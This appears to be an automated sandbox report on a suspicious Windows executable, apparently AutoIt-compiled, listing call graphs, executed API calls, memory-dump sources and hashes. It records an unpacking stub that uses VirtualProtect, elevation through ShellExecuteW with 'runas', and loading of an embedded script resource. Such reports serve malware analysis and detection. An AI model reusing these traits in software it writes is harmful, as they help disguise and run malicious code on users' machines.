8a01f8 RtlEnterCriticalSection RtlLeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98709->98710 98709->98711 98709->98712 98713 8901e0 207 API calls 2 library calls 98709->98713 98714 8906a0 41 API calls messages 98709->98714 98710->98709 98712->98711 98718 8f359c 82 API calls __wsopen_s 98712->98718 98713->98709 98714->98709 98715->98682 98716->98687 98717->98711 98718->98711 98719->98711 98720->98708 98721->98711 98722 881033 98727 884c91 98722->98727 98726 881042 98728 88a961 22 API calls 98727->98728 98729 884cff 98728->98729 98735 883af0 98729->98735 98732 884d9c 98733 881038 98732->98733 98738 8851f7 22 API calls __fread_nolock 98732->98738 98734 8a00a3 29 API calls __onexit 98733->98734 98734->98726 98739 883b1c 98735->98739 98738->98732 98740 883b0f 98739->98740 98741 883b29 98739->98741 98740->98732 98741->98740 98742 883b30 RegOpenKeyExW 98741->98742 98742->98740 98743 883b4a RegQueryValueExW 98742->98743 98744 883b6b 98743->98744 98745 883b80 RegCloseKey 98743->98745 98744->98745 98745->98740 98746 881056 98751 88344d 98746->98751 98748 88106a 98782 8a00a3 29 API calls __onexit 98748->98782 98750 881074 98752 88345d __wsopen_s 98751->98752 98753 88a961 22 API calls 98752->98753 98754 883513 98753->98754 98755 883a5a 24 API calls 98754->98755 98756 88351c 98755->98756 98783 883357 98756->98783 98759 8833c6 22 API calls 98760 883535 98759->98760 98761 88515f 22 API calls 98760->98761 98762 883544 98761->98762 98763 88a961 22 API calls 98762->98763 98764 88354d 98763->98764 98765 88a6c3 22 API calls 98764->98765 98766 883556 RegOpenKeyExW 98765->98766 98767 8c3176 RegQueryValueExW 98766->98767 98772 883578 98766->98772 98768 8c320c RegCloseKey 98767->98768 98769 8c3193 98767->98769 98768->98772 98774 8c321e _wcslen 98768->98774 98770 89fe0b 22 API calls 98769->98770 98771 8c31ac 98770->98771 98773 885722 22 API calls 98771->98773 98772->98748 98775 8c31b7 RegQueryValueExW 98773->98775 98774->98772 98779 884c6d 22 API calls 98774->98779 98780 889cb3 22 API calls 98774->98780 98781 88515f 22 API calls 98774->98781 98776 8c31d4 98775->98776 98778 8c31ee messages 98775->98778 98777 886b57 22 API calls 98776->98777 98777->98778 98778->98768 98779->98774 98780->98774 98781->98774 98782->98750 98784 8c1f50 __wsopen_s 98783->98784 98785 883364 GetFullPathNameW 98784->98785 98786 883386 98785->98786 98787 886b57 22 API calls 98786->98787 98788 8833a4 98787->98788 98788->98759 98789 9e1740 98790 9e1750 98789->98790 98791 9e186a LoadLibraryA 98790->98791 98795 9e18af VirtualProtect VirtualProtect 98790->98795 98792 9e1881 98791->98792 98792->98790 98794 9e1893 GetProcAddress 98792->98794 98794->98792 98797 9e18a9 ExitProcess 98794->98797 98796 9e1914 98795->98796 98796->98796 98798 883156 98801 883170 98798->98801 98802 883187 98801->98802 98803 8831eb 98802->98803 98804 88318c 98802->98804 98841 8831e9 98802->98841 98808 8c2dfb 98803->98808 98809 8831f1 98803->98809 98805 883199 98804->98805 98806 883265 PostQuitMessage 98804->98806 98811 8c2e7c 98805->98811 98812 8831a4 98805->98812 98843 88316a 98806->98843 98807 8831d0 NtdllDefWindowProc_W 98807->98843 98850 8818e2 10 API calls 98808->98850 98813 8831f8 98809->98813 98814 88321d SetTimer RegisterClipboardFormatW 98809->98814 98855 8ebf30 34 API calls ___scrt_fastfail 98811->98855 98816 8c2e68 98812->98816 98817 8831ae 98812->98817 98820 8c2d9c 98813->98820 98821 883201 KillTimer 98813->98821 98818 883246 CreatePopupMenu 98814->98818 98814->98843 98815 8c2e1c 98851 89e499 42 API calls 98815->98851 98854 8ec161 27 API calls ___scrt_fastfail 98816->98854 98824 8c2e4d 98817->98824 98825 8831b9 98817->98825 98818->98843 98827 8c2dd7 MoveWindow 98820->98827 98828 8c2da1 98820->98828 98846 8830f2 Shell_NotifyIconW ___scrt_fastfail 98821->98846 98824->98807 98853 8e0ad7 22 API calls 98824->98853 98831 8831c4 98825->98831 98832 883253 98825->98832 98826 8c2e8e 98826->98807 98826->98843 98827->98843 98833 8c2dc6 SetFocus 98828->98833 98834 8c2da7 98828->98834 98830 883263 98830->98843 98831->98807 98852 8830f2 Shell_NotifyIconW ___scrt_fastfail 98831->98852 98848 88326f 44 API calls ___scrt_fastfail 98832->98848 98833->98843 98834->98831 98838 8c2db0 98834->98838 98835 883214 98847 883c50 DeleteObject DestroyWindow 98835->98847 98849 8818e2 10 API calls 98838->98849 98841->98807 98844 8c2e41 98845 883837 49 API calls 98844->98845 98845->98841 98846->98835 98847->98843 98848->98830 98849->98843 98850->98815 98851->98831 98852->98844 98853->98841 98854->98830 98855->98826 98856 882e37 98857 88a961 22 API calls 98856->98857 98858 882e4d 98857->98858 98935 884ae3 98858->98935 98860 882e6b 98861 883a5a 24 API calls 98860->98861 98862 882e7f 98861->98862 98863 889cb3 22 API calls 98862->98863 98864 882e8c 98863->98864 98865 884ecb 94 API calls 98864->98865 98866 882ea5 98865->98866 98867 882ead 98866->98867 98868 8c2cb0 98866->98868 98872 88a8c7 22 API calls 98867->98872 98869 8f2cf9 80 API calls 98868->98869 98870 8c2cc3 98869->98870 98871 8c2ccf 98870->98871 98873 884f39 68 API calls 98870->98873 98877 884f39 68 API calls 98871->98877 98874 882ec3 98872->98874 98873->98871 98949 886f88 22 API calls 98874->98949 98876 882ecf 98878 889cb3 22 API calls 98876->98878 98879 8c2ce5 98877->98879 98880 882edc 98878->98880 98965 883084 22 API calls 98879->98965 98950 88a81b 41 API calls 98880->98950 98883 882eec 98885 889cb3 22 API calls 98883->98885 98884 8c2d02 98966 883084 22 API calls 98884->98966 98887 882f12 98885->98887 98951 88a81b 41 API calls 98887->98951 98888 8c2d1e 98890 883a5a 24 API calls 98888->98890 98891 8c2d44 98890->98891 98967 883084 22 API calls 98891->98967 98892 882f21 98894 88a961 22 API calls 98892->98894 98896 882f3f 98894->98896 98895 8c2d50 98897 88a8c7 22 API calls 98895->98897 98952 883084 22 API calls 98896->98952 98899 8c2d5e 98897->98899 98968 883084 22 API calls 98899->98968 98900 882f4b 98953 8a4a28 40 API calls 3 library calls 98900->98953 98903 8c2d6d 98906 88a8c7 22 API calls 98903->98906 98904 882f59 98904->98879 98905 882f63 98904->98905 98954 8a4a28 40 API calls 3 library calls 98905->98954 98908 8c2d83 98906->98908 98969 883084 22 API calls 98908->98969 98909 882f6e 98909->98884 98911 882f78 98909->98911 98955 8a4a28 40 API calls 3 library calls 98911->98955 98912 8c2d90 98914 882f83 98914->98888 98915 882f8d 98914->98915 98956 8a4a28 40 API calls 3 library calls 98915->98956 98917 882f98 98918 882fdc 98917->98918 98957 883084 22 API calls 98917->98957 98918->98903 98919 882fe8 98918->98919 98919->98912 98959 8863eb 22 API calls 98919->98959 98921 882fbf 98923 88a8c7 22 API calls 98921->98923 98925 882fcd 98923->98925 98924 882ff8 98960 886a50 22 API calls 98924->98960 98958 883084 22 API calls 98925->98958 98928 883006 98961 8870b0 23 API calls 98928->98961 98932 883021 98933 883065 98932->98933 98962 886f88 22 API calls 98932->98962 98963 8870b0 23 API calls 98932->98963 98964 883084 22 API calls 98932->98964 98936 884af0 __wsopen_s 98935->98936 98937 886b57 22 API calls 98936->98937 98938 884b22 98936->98938 98937->98938 98948 884b58 98938->98948 98970 884c6d 98938->98970 98940 884c6d 22 API calls 98940->98948 98941 889cb3 22 API calls 98943 884c52 98941->98943 98942 889cb3 22 API calls 98942->98948 98944 88515f 22 API calls 98943->98944 98946 884c5e 98944->98946 98945 88515f 22 API calls 98945->98948 98946->98860 98947 884c29 98947->98941 98947->98946 98948->98940 98948->98942 98948->98945 98948->98947 98949->98876 98950->98883 98951->98892 98952->98900 98953->98904 98954->98909 98955->98914 98956->98917 98957->98921 98958->98918 98959->98924 98960->98928 98961->98932 98962->98932 98963->98932 98964->98932 98965->98884 98966->98888 98967->98895 98968->98903 98969->98912 98971 88aec9 22 API calls 98970->98971 98972 884c78 98971->98972 98972->98938

                                      Executed Functions

                                      Function 008842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 234 8842de-88434d call 88a961 GetVersionExW call 886b57 239 8c3617-8c362a 234->239 240 884353 234->240 241 8c362b-8c362f 239->241 242 884355-884357 240->242 243 8c3631 241->243 244 8c3632-8c363e 241->244 245 88435d-8843bc call 8893b2 call 8837a0 242->245 246 8c3656 242->246 243->244 244->241 247 8c3640-8c3642 244->247 261 8c37df-8c37e6 245->261 262 8843c2-8843c4 245->262 250 8c365d-8c3660 246->250 247->242 249 8c3648-8c364f 247->249 249->239 252 8c3651 249->252 253 88441b-884435 GetCurrentProcess IsWow64Process 250->253 254 8c3666-8c36a8 250->254 252->246 256 884494-88449a 253->256 257 884437 253->257 254->253 258 8c36ae-8c36b1 254->258 260 88443d-884449 256->260 257->260 263 8c36db-8c36e5 258->263 264 8c36b3-8c36bd 258->264 270 88444f-88445e LoadLibraryA 260->270 271 8c3824-8c3828 GetSystemInfo 260->271 266 8c37e8 261->266 267 8c3806-8c3809 261->267 262->250 265 8843ca-8843dd 262->265 268 8c36f8-8c3702 263->268 269 8c36e7-8c36f3 263->269 272 8c36bf-8c36c5 264->272 273 8c36ca-8c36d6 264->273 274 8c3726-8c372f 265->274 275 8843e3-8843e5 265->275 276 8c37ee 266->276 279 8c380b-8c381a 267->279 280 8c37f4-8c37fc 267->280 277 8c3704-8c3710 268->277 278 8c3715-8c3721 268->278 269->253 281 88449c-8844a6 GetSystemInfo 270->281 282 884460-88446e GetProcAddress 270->282 272->253 273->253 286 8c373c-8c3748 274->286 287 8c3731-8c3737 274->287 284 8c374d-8c3762 275->284 285 8843eb-8843ee 275->285 276->280 277->253 278->253 279->276 288 8c381c-8c3822 279->288 280->267 283 884476-884478 281->283 282->281 289 884470-884474 GetNativeSystemInfo 282->289 294 88447a-88447b FreeLibrary 283->294 295 884481-884493 283->295 292 8c376f-8c377b 284->292 293 8c3764-8c376a 284->293 290 8843f4-88440f 285->290 291 8c3791-8c3794 285->291 286->253 287->253 288->280 289->283 296 8c3780-8c378c 290->296 297 884415 290->297 291->253 298 8c379a-8c37c1 291->298 292->253 293->253 294->295 296->253 297->253 299 8c37ce-8c37da 298->299 300 8c37c3-8c37c9 298->300 299->253 300->253
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 0088430D
                                        • Part of subcall function 00886B57: _wcslen.LIBCMT ref: 00886B6A
                                      • GetCurrentProcess.KERNEL32(?,0091CB64,00000000,?,?), ref: 00884422
                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00884429
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00884454
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00884466
                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00884474
                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 0088447B
                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 008844A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                      • API String ID: 3290436268-3101561225
                                      • Opcode ID: c4acd4f7d082d35fd173a2880fdb086b50e6836d625edce6133a5e7f7e592a54
                                      • Instruction ID: c60c7a29d59642046ac10e4b8a27d1e7bd921e529f99146a81c5dc1ee721f27f
                                      • Opcode Fuzzy Hash: c4acd4f7d082d35fd173a2880fdb086b50e6836d625edce6133a5e7f7e592a54
                                      • Instruction Fuzzy Hash: 56A1A26293E3C4DFC711E76BBC617957FA4BF3634AB0898ADE041D3A21D2304949EB25
                                      Function 00883170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145timewindowregistryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 442 883170-883185 443 8831e5-8831e7 442->443 444 883187-88318a 442->444 443->444 447 8831e9 443->447 445 8831eb 444->445 446 88318c-883193 444->446 451 8c2dfb-8c2e23 call 8818e2 call 89e499 445->451 452 8831f1-8831f6 445->452 448 883199-88319e 446->448 449 883265-88326d PostQuitMessage 446->449 450 8831d0-8831d8 NtdllDefWindowProc_W 447->450 454 8c2e7c-8c2e90 call 8ebf30 448->454 455 8831a4-8831a8 448->455 457 883219-88321b 449->457 456 8831de-8831e4 450->456 486 8c2e28-8c2e2f 451->486 458 8831f8-8831fb 452->458 459 88321d-883244 SetTimer RegisterClipboardFormatW 452->459 454->457 479 8c2e96 454->479 461 8c2e68-8c2e77 call 8ec161 455->461 462 8831ae-8831b3 455->462 457->456 465 8c2d9c-8c2d9f 458->465 466 883201-883214 KillTimer call 8830f2 call 883c50 458->466 459->457 463 883246-883251 CreatePopupMenu 459->463 461->457 469 8c2e4d-8c2e54 462->469 470 8831b9-8831be 462->470 463->457 472 8c2dd7-8c2df6 MoveWindow 465->472 473 8c2da1-8c2da5 465->473 466->457 469->450 482 8c2e5a-8c2e63 call 8e0ad7 469->482 477 883253-883263 call 88326f 470->477 478 8831c4-8831ca 470->478 472->457 480 8c2dc6-8c2dd2 SetFocus 473->480 481 8c2da7-8c2daa 473->481 477->457 478->450 478->486 479->450 480->457 481->478 487 8c2db0-8c2dc1 call 8818e2 481->487 482->450 486->450 490 8c2e35-8c2e48 call 8830f2 call 883837 486->490 487->457 490->450
                                      APIs
                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,0088316A,?,?), ref: 008831D8
                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,0088316A,?,?), ref: 00883204
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00883227
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00883232
                                      • CreatePopupMenu.USER32 ref: 00883246
                                      • PostQuitMessage.USER32(00000000), ref: 00883267
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                      • String ID: TaskbarCreated
                                      • API String ID: 157504867-2362178303
                                      • Opcode ID: fcefe304f750e9f5e0d8ba058feea92b5800107fccc5fddb78e04eb33b2528d5
                                      • Instruction ID: bc6a3ee169db6775082a526c2adeddc5f9a0124885637c58f5a91dfb7f614a70
                                      • Opcode Fuzzy Hash: fcefe304f750e9f5e0d8ba058feea92b5800107fccc5fddb78e04eb33b2528d5
                                      • Instruction Fuzzy Hash: 15412735258308A7DB257B78AC1DBBD3A69F705F06F044125F902C52E2CBB09A40E762
                                      Function 008842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 532 8842a2-8842ba CreateStreamOnHGlobal 533 8842da-8842dd 532->533 534 8842bc-8842d3 FindResourceExW 532->534 535 8842d9 534->535 536 8c35ba-8c35c9 LoadResource 534->536 535->533 536->535 537 8c35cf-8c35dd SizeofResource 536->537 537->535 538 8c35e3-8c35ee LockResource 537->538 538->535 539 8c35f4-8c3612 538->539 539->535
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008842B2
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008850AA,?,?,00000000,00000000), ref: 008842C9
                                      • LoadResource.KERNEL32(?,00000000,?,?,008850AA,?,?,00000000,00000000,?,?,?,?,?,?,00884F20), ref: 008C35BE
                                      • SizeofResource.KERNEL32(?,00000000,?,?,008850AA,?,?,00000000,00000000,?,?,?,?,?,?,00884F20), ref: 008C35D3
                                      • LockResource.KERNEL32(008850AA,?,?,008850AA,?,?,00000000,00000000,?,?,?,?,?,?,00884F20,?), ref: 008C35E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                      • String ID: SCRIPT
                                      • API String ID: 3051347437-3967369404
                                      • Opcode ID: 5158cd7bd6dba36957cf76ffc89763180ce4e7852ea8650f1f6663fa87c67b49
                                      • Instruction ID: 0f6b70d8adbd806d4d2808e26776a23d8bde5604fca422951474a8d8932bea12
                                      • Opcode Fuzzy Hash: 5158cd7bd6dba36957cf76ffc89763180ce4e7852ea8650f1f6663fa87c67b49
                                      • Instruction Fuzzy Hash: 4011ACB1344305BFD7219B65DC48F677BB9FBC9B55F108569B412C6250DBB2D800D620
                                      Function 008C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00882B6B
                                        • Part of subcall function 00883A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00951418,?,00882E7F,?,?,?,00000000), ref: 00883A78
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • GetForegroundWindow.USER32(runas,?,?,?,?,?,00942224), ref: 008C2C10
                                      • ShellExecuteW.SHELL32(00000000,?,?,00942224), ref: 008C2C17
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                      • String ID: runas
                                      • API String ID: 448630720-4000483414
                                      • Opcode ID: 876353eed4db4e153b253f35f7a34f79d69bdf42cfc9e158d59069159364af52
                                      • Instruction ID: dc1fb6bd80b61490537ea2a46cea31fd0e3106122316bf3dc148349d8cf0aeb1
                                      • Opcode Fuzzy Hash: 876353eed4db4e153b253f35f7a34f79d69bdf42cfc9e158d59069159364af52
                                      • Instruction Fuzzy Hash: 9C11BE31208305AAC715FF68E852EBEB7A4FB95765F48142DF082D21E2CF218A4AD713
                                      Function 0088D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetInputState.USER32 ref: 0088D807
                                      • timeGetTime.WINMM ref: 0088DA07
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0088DB28
                                      • TranslateMessage.USER32(?), ref: 0088DB7B
                                      • DispatchMessageW.USER32(?), ref: 0088DB89
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0088DB9F
                                      • Sleep.KERNEL32(0000000A), ref: 0088DBB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                      • String ID:
                                      • API String ID: 2189390790-0
                                      • Opcode ID: cc1526333c3f7a0b411bef57c6e05a12db64f1685d74dc882aea9d7158d2708a
                                      • Instruction ID: 8ae5821de2cc025083bd6dd2497f3bdbb7dc5a47bd24ee16d586ea4699358ac4
                                      • Opcode Fuzzy Hash: cc1526333c3f7a0b411bef57c6e05a12db64f1685d74dc882aea9d7158d2708a
                                      • Instruction Fuzzy Hash: EF42EF70608345EFDB28EF28C844BAABBE1FF96314F14865AE495C7391D770E844DB92
                                      Function 008C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 301 8c065b-8c068b call 8c042f 304 8c068d-8c0698 call 8af2c6 301->304 305 8c06a6-8c06b2 call 8b5221 301->305 312 8c069a-8c06a1 call 8af2d9 304->312 310 8c06cb-8c0714 call 8c039a 305->310 311 8c06b4-8c06c9 call 8af2c6 call 8af2d9 305->311 320 8c0716-8c071f 310->320 321 8c0781-8c078a GetFileType 310->321 311->312 322 8c097d-8c0983 312->322 326 8c0756-8c077c GetLastError call 8af2a3 320->326 327 8c0721-8c0725 320->327 323 8c078c-8c07bd GetLastError call 8af2a3 CloseHandle 321->323 324 8c07d3-8c07d6 321->324 323->312 338 8c07c3-8c07ce call 8af2d9 323->338 329 8c07df-8c07e5 324->329 330 8c07d8-8c07dd 324->330 326->312 327->326 331 8c0727-8c0754 call 8c039a 327->331 334 8c07e9-8c0837 call 8b516a 329->334 335 8c07e7 329->335 330->334 331->321 331->326 344 8c0839-8c0845 call 8c05ab 334->344 345 8c0847-8c086b call 8c014d 334->345 335->334 338->312 344->345 350 8c086f-8c0879 call 8b86ae 344->350 351 8c086d 345->351 352 8c087e-8c08c1 345->352 350->322 351->350 354 8c08e2-8c08f0 352->354 355 8c08c3-8c08c7 352->355 358 8c097b 354->358 359 8c08f6-8c08fa 354->359 355->354 357 8c08c9-8c08dd 355->357 357->354 358->322 359->358 360 8c08fc-8c092f CloseHandle call 8c039a 359->360 363 8c0931-8c095d GetLastError call 8af2a3 call 8b5333 360->363 364 8c0963-8c0977 360->364 363->364 364->358
                                      APIs
                                        • Part of subcall function 008C039A: CreateFileW.KERNELBASE(00000000,00000000,?,008C0704,?,?,00000000,?,008C0704,00000000,0000000C), ref: 008C03B7
                                      • GetLastError.KERNEL32 ref: 008C076F
                                      • __dosmaperr.LIBCMT ref: 008C0776
                                      • GetFileType.KERNELBASE(00000000), ref: 008C0782
                                      • GetLastError.KERNEL32 ref: 008C078C
                                      • __dosmaperr.LIBCMT ref: 008C0795
                                      • CloseHandle.KERNEL32(00000000), ref: 008C07B5
                                      • CloseHandle.KERNEL32(?), ref: 008C08FF
                                      • GetLastError.KERNEL32 ref: 008C0931
                                      • __dosmaperr.LIBCMT ref: 008C0938
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: H
                                      • API String ID: 4237864984-2852464175
                                      • Opcode ID: a4ca73ce52290f3eaf8f7840d7306f6e38f74663e7a883f787736691f1946e8c
                                      • Instruction ID: bfe13d1c4eca2de7f6b11fac5cfed073e40d9628dd19359993c5b3e9c8141c39
                                      • Opcode Fuzzy Hash: a4ca73ce52290f3eaf8f7840d7306f6e38f74663e7a883f787736691f1946e8c
                                      • Instruction Fuzzy Hash: 74A10132A142088FDF19AFA8D851BAE3BB0FB4A364F14415DF811DB292D731D912DF92
                                      Function 0088344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00883A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00951418,?,00882E7F,?,?,?,00000000), ref: 00883A78
                                        • Part of subcall function 00883357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00883379
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0088356A
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008C318D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008C31CE
                                      • RegCloseKey.ADVAPI32(?), ref: 008C3210
                                      • _wcslen.LIBCMT ref: 008C3277
                                      • _wcslen.LIBCMT ref: 008C3286
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
